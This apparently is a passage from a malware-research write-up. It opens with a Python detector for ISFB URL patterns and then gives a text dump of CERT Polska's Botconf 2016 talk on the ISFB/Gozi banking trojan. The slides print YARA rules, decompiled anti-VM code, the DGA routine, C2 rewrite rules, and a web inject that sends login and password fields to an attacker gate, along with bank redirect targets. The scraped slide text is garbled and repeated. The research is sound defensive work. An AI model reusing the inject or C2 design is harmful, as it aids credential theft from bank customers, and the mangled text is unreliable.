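    s = re.sub(r"_([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    for candidate in (s, s + "=", s + "=="):
        try:
            return base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue
    return None


def escape_blob(raw: bytes) -> str:
    """Inverse of unescape_blob; used here only to build the constructed log lines."""
    s = base64.b64encode(raw).decode().rstrip("=")
    return "".join(c if c.isalnum() else "_%02X" % ord(c) for c in s)


def classify(url: str) -> Optional[Tuple[str, str, int]]:
    """Return (purpose, era, decoded blob length) for an ISFB-style URL, else None.

    The legacy patterns are broad, so a hit also requires the carried blob
    (last path component for the current format, first query value for the
    legacy one) to decode to at least MIN_BLOB bytes.
    """
    path, _, query = url.partition("?")
    path = path.split("://", 1)[-1]
    path = path[path.find("/"):] if "/" in path else "/"
    for rx, purpose, era in PATTERNS:
        if not rx.search(path):
            continue
        if era == "current":
            blob = path.rsplit("/", 1)[-1].rsplit(".", 1)[0]
        else:
            blob = query.partition("=")[2]
        raw = unescape_blob(blob)
        if raw is None or len(raw) < MIN_BLOB:
            return None
        return purpose, era, len(raw)
    return None


# Constructed proxy log: three ISFB-shaped requests to a placeholder host
# plus two benign look-alikes that must not be flagged.
SAMPLE_LOG = [
    "GET http://placeholder.invalid/images/%s.bmp" % escape_blob(b"constructed filler " * 3),
    "GET http://placeholder.invalid/tfctq.php?mkvf=%s" % escape_blob(b"constructed task poll"),
    "GET http://placeholder.invalid/images/%s.avi" % escape_blob(b"constructed filler " * 3),
    "GET http://example.test/test.php?page=home",
    "GET http://example.test/images/logo.gif",
]


def triage(lines: List[str]) -> List[Tuple[str, str, str, int]]:
    """Run classify over 'METHOD URL' log lines; returns (url, purpose, era, nbytes) hits."""
    hits = []
    for line in lines:
        url = line.split()[1]
        res = classify(url)
        if res is not None:
            hits.append((url,) + res)
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```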

C&C response (screenshot slides)

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response (screenshot slide)


Command and Control

IAP

    rewrite ^/fileto/(.*)(\.bin)  /get128.php?x=$1   break;
    rewrite ^/images/(.*)(\.bmp)  /data.php?x=$1$2   break;
    rewrite ^/images/(.*)(\.avi)  /loader.php?x=$1$2 break;
    rewrite ^/images/(.*)(\.gif)  /task.php?x=$1$2   break;
    rewrite ^/images/(.*)(\.jpeg) /config.php?x=$1$2 break;

IAP (screenshot slides)

Dreambot

    RewriteEngine on
    RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
    RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
    RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
    RewriteRule ^images/(.*)(\.bmp)  new_dhandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)(\.gif)  new_thandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)(\.jpeg) new_chandler.php?q=$1$2 [L,QSA]

Dreambot (screenshot slides)

Dreambot

    rule isfb_dreambot : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

The End (or not)

Offsprings and Cousins

Common Roots
· Bolek/KBOT - based on gozi
· Rovnix - ISFB was ring3 payload protected by rovnix
· Vawtrak - Nothing in common

Payloads
· Nymaim
· Powersniff PunchyBagg

Recap

· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read paper for more details
· Code soon available on mak's GitHub: random-stuff/isfb

Kudos

people that knowingly (or not) helped us

· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Q & A

info@cert.pl, www.cert.pl

CERTPolska / CERTPolska_en

mak: mak@cert.pl

Page 6: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 658

ISFB

UrsnifGoziGozi2RovnixVawtrak

DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C

ISFB project Version 213241 module dllc $Revision 265 $

658

02122016 ISFB

httpslokalhostpltalksbotconf20161 758

Scale

(n6 sinkhole connections in october - bankers only)

758

02122016 ISFB

httpslokalhostpltalksbotconf20161 858

Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]

858

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 7: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 758

Scale

(n6 sinkhole connections in october - bankers only)

758

02122016 ISFB

httpslokalhostpltalksbotconf20161 858

Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]

858

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem

C

‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN

1958

02122016 ISFB

httpslokalhostpltalksbotconf20161 2058

Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]

C

2058

Static cfg - fields

02122016 ISFB

httpslokalhostpltalksbotconf20161 2158

Static cfg - fields

0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2158

02122016 ISFB

httpslokalhostpltalksbotconf20161 2258

Static cfg

2258

02122016 ISFB

httpslokalhostpltalksbotconf20161 2358

Static cfg

2358

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

